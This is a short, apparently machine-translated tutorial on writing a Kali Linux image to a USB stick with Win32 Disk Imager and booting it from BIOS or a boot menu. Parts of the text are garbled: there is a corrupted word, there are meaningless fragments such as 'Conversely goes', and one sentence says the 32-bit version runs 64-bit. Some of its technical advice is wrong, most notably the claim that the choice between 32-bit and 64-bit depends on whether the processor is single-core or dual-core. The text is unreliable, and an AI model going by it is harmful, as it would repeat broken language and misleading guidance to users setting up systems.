First you have downloaded an image of the distribution. There are several images of the 32-bit version , the 64 bit version and versions for ARM processors . Computers with a single core ( single processor ) , go 32-bit , and those with Dual Core , go 64bit . The 32 -bit version , operating both 32 -bit and 64- bit . Conversely goes . Who Dual Core processor , I recommend to choose the 64-bit version because the 64-bit everything is faster . The steps to be followed : Downloaded the image you want to use : Kali Linux 32 bit or Kali Linux 64 bits Downloaded software Win32 Disk Imager ( 5.4 MB ) Insert a memory stick 2GB which have FAT32 file system (usually sticks already formatted FAT32 Win32 Disk Imager installed Win32 Disk Imager start the program , select the Image file downloaded image and the Device , select the USB stick with the letter recognized by Windows . Press Write ! Both ! How to start Linux Kali To start Linux on the stick , you must restart the computer to boot from the stick . Most computers are set to boot first from the DVD -ROM drive, then the hard drive. There are two ways to start Linux from the stick . Either change the BIOS Boot Device Priority, and put on the first place USB KEY, times change , we set the Boot Menu, at startup, to Enable. Second Options enables that on startup , after pressing F12 usual, but sometimes it's set to F8 or F11 to bring up a menu from which we can select what device to boot from. In case if the pressing F12 , F11 or F8 menu does not appear from which you can select USB , then you can enter the BIOS to change the settings by pressing the Del , F2 .. depends on the system configuration . Backtrack image can burn bineinîn?eles and a DVD, and can be run from there, but the stick version is much better , because the system runs faster on the stick , the stick is portable , takes up less space and is more silent . Source